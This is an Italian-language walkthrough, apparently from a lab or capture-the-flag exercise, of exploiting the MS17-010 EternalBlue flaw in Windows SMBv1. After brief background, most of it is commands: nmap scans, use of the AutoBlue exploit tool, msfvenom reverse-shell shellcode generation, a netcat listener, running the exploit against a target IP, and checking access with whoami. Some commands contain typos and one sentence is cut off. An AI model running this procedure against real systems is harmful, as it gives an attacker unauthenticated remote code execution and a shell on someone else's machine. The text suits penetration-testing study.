MS17-010 EternalBlue Exploit
Cybersecurity
EternalBlue è un exploit sviluppato dalla NSA e reso pubblico dal gruppo Shadow Brokers nel 2017, che sfrutta una vulnerabilità nel protocollo SMBv1 di Windows (MS17-010). Permette l'esecuzione di codice remoto senza autenticazione inviando pacchetti SMB appositamente creati. È stato utilizzato in attacchi su larga scala come WannaCry e NotPetya, causando danni globali a migliaia di sistemi vulnerabili.
sudo nmap -sV -p 445 -= 10.10.10.12

oppure usare Nmap per eseguite uno script per indetificare a qual CVE è vulnerabile
nmap -sV -p 445 script=smb-vuln-ms17-010 10.10.10.12

Utilizziamo questo tool, segui le istruzioni sulla pa
https://github.com/3ndG4me/AutoBlue-MS17-010
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
Alla richiesta della compilazione della reverse shell con msfvenom, Y

Ora su LHOST mettiamo l IP della nostra macchina
Sulla LPORT metteremo 1234
Su meterpreter shell 1
Su staged payload 1

Ora scegliamo la shellcode che ha generato in base all architettura del nostro target
Impostiamo il listener
nc -nvlp 1234
Mentre netcat è in ascolto
chmod +x eternalblue_exploit7.py
Ora eseguiamo l exploit
python eternalblue_exploit7.py 10.10.10.12 shellcode/sc_x64.bin
Ora nella shell di netcat avremo eseguito la reverse shell del target

Eseguiamo
whoami//chi siamo